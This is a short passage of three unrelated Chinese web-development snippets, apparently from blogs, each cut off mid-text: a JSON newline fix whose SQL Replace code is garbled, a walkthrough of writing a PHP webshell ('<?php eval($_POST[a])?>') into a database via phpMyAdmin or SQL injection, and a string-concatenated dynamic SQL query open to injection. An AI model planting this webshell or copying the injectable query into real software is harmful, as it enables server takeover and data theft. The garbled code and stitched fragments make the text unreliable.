今天要用bootstrap开发一个网页,要使用到JSON,但是JSON的格式不正确,然后在http://www.bejson.com/[Be JSON]中测试了一下JSON. 发现JSON中多了一个换行符,然后在输入库中清掉换行符就得到正确的JSON格式了.在Windows或者是SQL中的换行符都是以\r\n存在的,所有使用 Replace()函数置换就行.在Ascii码中,\n是10,\r是13 Update Table Set Column1=Replare(Column1,),'') Up
在web应用场景下,经常会碰到SQL注入场景,如页面能够执行SQL语句,那么可能会有直接通过SQL语句写入webshell的风险,常见的phpmyadmin环境下,通过几个语句可以轻松将一句话木马写入到服务器文件,如下: use test; //进入数据库create table test (shell text not null); //创建表insert into test (shell) values('<?php eval($_POST[a])?>'); //插入表单数据select
以前拼接的写法 set @sql=' select * from table where 1=1 ' if (@addDate is not null) set @sql = @sql+' and addDate = '+ @addDate + ' ' if (@name <>'' and is not null) set @sql = @sql+ ' and name = ' + @name + ' ' exec(@sql) 下面是 不采用拼接SQL字符串实现多条件查询的解决方案 第